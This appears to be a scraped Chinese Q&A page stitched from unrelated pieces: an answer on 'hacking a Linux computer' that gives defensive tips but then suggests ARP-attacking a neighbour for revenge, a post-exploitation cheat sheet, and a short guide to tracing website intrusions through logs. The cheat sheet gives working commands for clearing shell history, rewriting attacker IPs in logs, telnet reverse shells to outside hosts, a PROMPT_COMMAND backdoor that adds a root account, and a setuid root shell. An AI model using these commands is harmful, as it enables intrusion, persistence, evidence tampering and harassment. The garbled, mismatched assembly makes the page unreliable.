怎么入侵Linux电脑?高分求助

怎么入侵Linux电脑?高分求助,第1张

由于linux系统本身的设计,你如果不知道对方的管理员权限密码,基本上除了他主动向你开放网络文件服务,你是无法获得对方对方系统内的任何文件的。所以如果你真的想要入侵他的电脑,尤其在你电脑水平不高的情况下,通过网络入侵成功的可能性,还不如你拿个U盘去他房间直接拷贝文件的成功可能性高(开个玩笑)。

所以,其实你最应该做的,不是入侵他的电脑,而是做好自己的安全保障工作,以免自己的文件再次被别人偷取。我有以下建议(既然你说熟悉windows,具体 *** 作我就不赘述了):

1.检查自己系统的病毒/木马,并清除(如果有)。因为很多被入侵的windows用户其实是因为自己运行了黑客软件的服务端,从而成为了黑客的肉鸡,在这种情况下,把在你系统中偷偷运行的黑客软件清除掉即可(用普通的杀毒软件即可,建议使用360)。〔重要!很多木马可以对外开放文件服务〕

2.关闭所有的网络服务以及文件共享服务(网上有海量的此类介绍,或者用优化大师等优化软件进行设置)[重要!通过你的共享,同个局域网下的用户可以获得你的文件的]。

3.下载并安装最新的系统安全补丁。

4.不要运行从网上下载的带有exe后缀的文件,或者解压后出现的exe文件(无论是谁发送给你的,即使是认识的人)。如果一定要运行,先主动对此文件查毒,再运行。

5.为系统管理员账户加上密码,同时任何用户都不要设置空密码,禁用guest账户。

================

最后,你如果真的想要小小的报复一下你的邻居,可以给你一个小小的建议:

你可以先获得他的局域网IP地址以及mac地址,然后去找可以进行ARP攻击的软件。ARP攻击可以让其无法上网,而且最重要的是。。。ARP攻击无视系统防御。。。。。

1,登录ssh之后不记录history

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOGexport HISTFILE=/dev/nullexport HISTSIZE=0export HISTFILESIZE=0

2. sed的一些邪恶用法

邪恶的替换到登录的IP和日志里的访问IP

sed -s ’s/211.xxx.xxx.xxx/192.168.1.1/g’ access_log access.log security

邪恶的添加ssh限制登录的用户

sed -i ’s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g’ sshd_config

不过这个添加之后要强制重启sshd服务才可以生效

lsof -i:22 查找sshd的进程ID

COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME

sshd18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)

sshd31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)

然后

kill -SIGHUP 18662

3.通过webshell反dshell回来之后获取真正的ttyshell

python -c ‘import ptypty.spawn(“/bin/sh”)’

另外一种获取ttyshell的方法

$ cat sh.exp

#!/usr/bin/expect

# Spawn a shell, then allow the user to interact with it.

# The new shell will have a good enough TTY to run tools like ssh, su and login

spawn sh

interact

bash sh.exp

4.通过TELNET进行反向连接:

telnet [attacker_ipaddr] [port1] /bin/bash telnet [attacker_ipaddr] [port2]

telnet 210.51.173.41 8080 /bin/bash telnet 210.51.173.41 8081

/usr/bin/telnet 203.93.28.236 8000/bin/bash/usr/bin/telnet 203.93.28.236 8001

在203.93.28.236上面运行:

nc –l –p 8000

nc –l –p 8001

/usr/bin/telnet 192.168.1.100 8088/bin/bash/usr/bin/telnet 192.168.1.100 8089

5.curl download

The full command should look something like this:

curl -C – -O http://www.mirror.com/path/to/NeoOffice-Patch.dmg

6.Windows下面NC监听linux返回shell执行命令不能正确换行的解决办法

unalias ls

7.linux的BASH提权

export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null &&echo kkoo:123456 /usr/sbin/chpasswd &>/dev/null &&unset PROMPT_COMMAND”

8.ssh tunnel

ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host

ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host

ssh -C -f -N -g -D listen_port user@Tunnel_Host-f

9.本地rootshell

bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体 *** 作比较简单,大概说一下cp /bin/ksh . chown root.root kshchmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低俗,但某些时候还是很有用的。所以一般情况下把多余的shell删除可以在一定程度上增加黑客的入侵成本,没实施的同学可以考虑在标准化里面加入这个 *** 作

最近某司网站主页被篡改了,找师傅帮忙看看怎么回事,师傅没有空就交给我了……我自己这方面没有了解很多。事情结束后,又找师傅问了问关于溯源的技巧经验,于是就有了这篇小结。

看对方的目的是什么,就是最终目标是做什么。然后根据自己经验 看看达到这个目标 需要进行什么 *** 作 逆推回去。看看这些过程都会留下什么日志。

分析网站源码可以帮助我们获取网站被入侵时间, 黑客如何的 IP, 等信息, 对于接下来的日志分析有很大帮助。

可以使用 D 盾查杀是否存在网站后门,如果存在 webshell,记录下该 webshell 的信息。

找到 webshell 后,就可以根据该文件的路径,在日志里查找有关信息,例如访问该文件的 IP、时间等。可以根据这些信息确定网站别入侵的时间,从而缩小搜索范围,运气好了可以直接根据 IP 找到黑客。

diff 工具推荐-diffmerge

可以根据被修改的文件的修改时间,缩小搜索范围。

可以根据文件的排序迅速找到被黑客修改的文件,从而找到入侵时间。

例:查看 10 分钟内修改过的文件

网站日志一般为

根据上一步分析网站源码得到的信息在对日志文件进行筛选分析,因为日志文件会记录很多信息,如果一条一条分析,不是很现实。

web-log 分析工具

系统日志分析

/var/log/wtmp 和/var/run/utmp 两个文件无法直接使用 cat 命令输出,但是可以使用一些命令来查看,比如 w/who/finger/id/last/ac/uptime

该命令查询 /var/log/wtmp 文件并显示 当前 系统中每个用户和它所运行的进程信息:

该命令往回搜索 /var/log/wtmp 文件来显示自从该文件第一次创建以来所有登录过的用户:

如果指明了用户,则该命令只显示该用户的近期活动:

/var/log/lastlog 文件在每次有用户登录时被查询。可以使用 lastlog 命令来检查某特定用户上次登录的时间,并格式化输出上次登录日志 /var/log/lastlog 的内容。它根据 UID 排序显示登录名、端口号(tty)和上次登录时间。如果一个用户从未登录过,lastlog 显示 Never logged(从未登录过)。注意需要以 root 运行该命令:

4. id 用单独的一行打印出当前登录的用户,每个显示的用户名对应一个登录会话。 如果一个用户有不止一个登录会话,那他的用户名将显示相同的次数:

检查服务器是否有黑客留下的木马程序。

指令:ps aux|grep ‘pid’

整理完这篇总结,感觉溯源是一个很细节的事情,需要注意每一个细节,这篇总结也可以是一个备忘,以后在遇到溯源的活,做的时候就可以更系统一些。第一次投稿写的不好,师傅们多多指教哈,嘻嘻。


欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/yw/8448789.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-16
下一篇 2023-04-16

发表评论

登录后才能评论

评论列表(0条)

保存